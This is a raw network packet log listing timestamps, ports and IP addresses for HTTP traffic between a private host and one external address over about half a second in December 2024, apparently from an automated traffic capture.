                                              Dec 13, 2024 17:57:34.766836882 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.766861916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.766906023 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.808494091 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.808537960 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.808547020 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.808582067 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.812603951 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.812680006 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.880537987 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.880791903 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.880800962 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.880837917 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.881840944 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.881891966 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.881932020 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.881972075 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.886547089 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.886598110 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.886683941 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.886728048 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.891412973 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.891427994 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.891467094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.896051884 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.896100044 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.896110058 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.896169901 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.900840998 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.900891066 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.900906086 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.900943041 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.905375957 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.905426025 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.905492067 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.905534983 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.910016060 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.910042048 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.910073996 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.910103083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.914705992 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.914890051 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.914956093 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.919275999 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.919368029 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.919425011 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.923930883 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.923969984 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.924025059 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.928632975 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.928658962 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.928735018 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.933347940 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.933438063 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.933505058 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.937822104 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.937875032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.937937021 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.941633940 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.941709995 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.941749096 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.941812992 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.945156097 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.945305109 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.945353985 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.948931932 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.948978901 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.949054003 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.952404022 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.952455997 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.952487946 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.952528954 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.956343889 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.956439972 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.956490040 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.960104942 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.960433960 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.960490942 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.963591099 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.963639021 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.963718891 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.963762999 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:34.967005014 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.967410088 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:34.967458010 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.000523090 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.000602961 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.000632048 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.000679016 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.002382040 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.002434015 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.002526045 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.002573967 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.005980015 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.006931067 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.090214968 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.090347052 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.090411901 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.090413094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.091418982 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.091469049 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.091558933 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.091599941 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.093277931 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.093327045 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.093405962 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.093451023 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.096072912 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.096131086 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.096183062 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.096226931 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.098206997 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.098258972 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.098330975 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.098376036 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.100882053 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.100935936 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.100980043 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.101021051 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.103137970 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.103187084 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.103246927 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.103290081 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.105632067 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.105681896 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.105743885 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.105787039 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.108072042 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.108125925 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.108167887 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.108211994 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.110712051 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.110761881 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.110824108 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.110866070 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.112971067 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.113020897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.113064051 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.113105059 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.115430117 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.115475893 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.115535021 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.115576029 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.117970943 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.118017912 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.118052959 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.118094921 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.120382071 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.120430946 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.120452881 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.120491982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.122838974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.122889042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.122945070 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.122987986 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.125315905 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.125365973 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.125407934 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.125452042 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.127804995 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.127854109 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.127897024 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.127937078 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.130307913 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.130357981 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.130372047 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.130413055 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.132148027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.132191896 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.132237911 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.132277966 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.134043932 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.134099007 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.134109020 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.134144068 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.135970116 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.136019945 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.136109114 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.136156082 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.137871027 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.137922049 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.137926102 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.137965918 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.139806032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.139856100 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.139991045 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.140033007 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.141684055 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.141733885 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.141788006 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.141824961 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.143620968 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.143668890 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.143754959 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.143799067 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.145533085 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.145581961 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.145610094 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.145649910 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.147439003 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.147494078 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.147555113 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.147598028 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.149445057 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.149494886 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.149532080 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.149569988 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.151340961 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.151362896 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.151386976 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.151402950 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.153279066 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.153326035 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.153331041 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.153367043 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.155229092 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.155278921 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.155324936 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.155361891 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.157212973 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.157260895 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.157279015 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.157319069 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.158910990 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.158958912 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.158999920 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.159038067 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.160893917 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.160934925 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.161026001 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.161068916 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.162763119 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.162811041 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.162828922 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.162872076 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.164645910 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.164694071 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.164766073 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.164808989 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.166711092 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.166755915 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.166821003 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.166862011 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.168565035 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.168613911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.168663025 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.168704033 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.170448065 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.170494080 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.170530081 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.170566082 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.172298908 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.172346115 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.172472000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.172516108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.174216032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.174264908 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.283579111 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.283672094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.283804893 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.283847094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.284384012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.284435034 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.284584045 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.285938025 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.285986900 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.286478996 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.286525965 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.286587000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.286627054 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.288083076 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.288129091 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.288250923 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.288295984 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.289690971 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.289736032 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.289776087 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.289814949 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.291157007 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.291210890 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.291215897 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.291259050 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.292748928 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.292795897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.292886972 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.292936087 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.294259071 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.294302940 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.294523954 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.294567108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.295741081 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.295784950 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.295841932 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.295880079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.297235012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.297278881 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.297349930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.297388077 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.298754930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.298800945 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.298840046 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.298876047 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.300297022 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.300368071 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.300415993 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.300453901 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.301868916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.301917076 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.301932096 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.301970005 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.303309917 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.303366899 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.303455114 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.303502083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.304891109 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.304939032 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.304972887 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.305010080 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.306418896 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.306463957 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.306597948 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.306639910 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.307996988 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.308047056 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.308120966 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.308161020 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.309396029 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.309436083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.309472084 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.309508085 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.310904980 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.310955048 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.310987949 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.311024904 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.312423944 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.312472105 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.312515974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.312550068 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.313927889 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.313976049 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.314002037 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.314037085 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.315455914 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.315500975 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.315604925 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.315648079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.317004919 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.317050934 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.317145109 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.317190886 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.318510056 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.318557024 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.318686962 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.318748951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.320024967 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.320070982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.320111036 CET804970493.125.99.121192.168.2.5
